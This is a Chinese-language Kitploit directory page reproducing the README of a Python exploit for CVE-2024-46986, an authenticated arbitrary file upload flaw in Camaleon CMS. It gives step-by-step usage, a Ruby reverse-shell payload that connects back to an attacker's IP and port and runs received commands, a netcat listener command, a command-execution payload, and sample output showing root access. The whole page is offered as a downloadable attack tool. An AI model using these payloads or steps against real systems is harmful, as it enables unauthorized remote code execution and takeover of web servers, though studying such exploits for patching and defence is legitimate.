Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-46986 — Camaleon CMS 任意文件上传漏洞(CVE-2024-46986)的自动化 Python 利用工具。支持用于认证后远程代码执行的反弹 Shell 和命令执行载荷。 | Kitploit
工具/GitHubGitHub/vidura2/cve-2024-46986
漏洞利用Web应用程序漏洞利用渗透测试学习与教育远程访问工具Payload 开发
GitHubvidura2/cve-2024-46986

CVE-2024-46986

Camaleon CMS 任意文件上传漏洞(CVE-2024-46986)的自动化 Python 利用工具。支持用于认证后远程代码执行的反弹 Shell 和命令执行载荷。

查看仓库
391年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-46986

Camaleon CMS 漏洞利用 - 任意文件上传

该存储库包含一个 Python 脚本,用于自动化利用 Camaleon CMS 中的文件上传漏洞。该漏洞允许攻击者向服务器上传任意文件(如 Ruby 脚本),可能导致远程代码执行 (RCE) 或其他严重安全影响。

功能

  • 文件上传利用:向目标服务器上传恶意 Ruby 脚本。
  • 有效载荷选项:在反弹 Shell 有效载荷和命令执行有效载荷之间选择。
  • 重复命令执行:对于命令执行有效载荷,脚本允许用户重复输入命令。
  • 自动化:使用 Python 的 requests 库自动化整个过程。

前提条件

  • 有效用户凭证:需要经过身份验证的会话才能利用漏洞。你需要一个有效用户的 auth_token 和 _cms_session。

  • Python 3.x:确保已安装 Python 3.x。

  • Python requests 库:如果尚未安装,请安装 requests 库。

    root@kitploit:~
    pip install requests
    

使用方法

root@kitploit:~
克隆存储库:

bash

https://github.com/vidura2/CVE-2024-46986.git cd CVE-2024-46986

修改脚本:

root@kitploit:~
将 Python 脚本中的占位符 `your_auth_token_here`、`your_session_token_here` 和 `https://target_site_here` 替换为实际值。
如果使用反弹 Shell 有效载荷,还需要将 `your_ip` 和 `your_port` 替换为你的 IP 地址以及你将设置监听器的端口。

选择有效载荷类型:

root@kitploit:~
**反弹 Shell**:要上传反弹 Shell,请将脚本中的 `payload_type` 变量设置为 `"reverse_shell"`。
**命令执行**:要上传执行系统命令的脚本,请将 `payload_type` 设置为 `"command_execution"`。你将能够重复输入要在目标服务器上执行的命令。

运行漏洞利用脚本:

bash

python exploit_camaleon.py

如果使用命令执行有效载荷,你可以输入多个命令:

bash

root@kitploit:~
Enter a system command to execute (or type 'exit' to quit): whoami
Enter a system command to execute (or type 'exit' to quit): ls
Enter a system command to execute (or type 'exit' to quit): exit

有效载荷类型

  1. 反弹 Shell

反弹 Shell 有效载荷会连接回攻击者的机器,允许在服务器上远程执行代码。

root@kitploit:~
修改 Python 代码中 Ruby 脚本的 IP 和端口。

示例有效载荷:

ruby

require 'socket' s = TCPSocket.open('your_ip', your_port) while (cmd = s.gets) IO.popen(cmd, 'r') do |io| s.print io.read end end

在你的机器上使用 netcat 设置监听器:

bash

root@kitploit:~
nc -lvnp <your_port>

2. 命令执行

此有效载荷上传一个执行系统命令(例如 whoami)的 Ruby 脚本到服务器。你可以在执行期间重复输入命令。

root@kitploit:~
脚本会不断询问命令,直到你输入 exit。
示例:

ruby

system("whoami")

成功利用的示例

一旦漏洞被成功利用,你应该会在终端中看到指示成功的输出:

python

Exploit executed successfully with payload type: reverse_shell!

如果你使用反弹 Shell,netcat 监听器将让你能够访问受感染服务器的 Shell。

对于命令执行有效载荷:

bash

Enter a system command to execute (or type 'exit' to quit): whoami Command 'whoami' executed successfully! Response: root

免责声明

此脚本仅用于教育目的。作者对因使用此漏洞而造成的任何误用或损害概不负责。在测试或利用漏洞之前,请务必确保你已获得许可。 贡献

欢迎提交问题或拉取请求以改进或添加功能!

许可协议

本项目采用 MIT 许可证 - 详情请参见 LICENSE 文件。

下载工具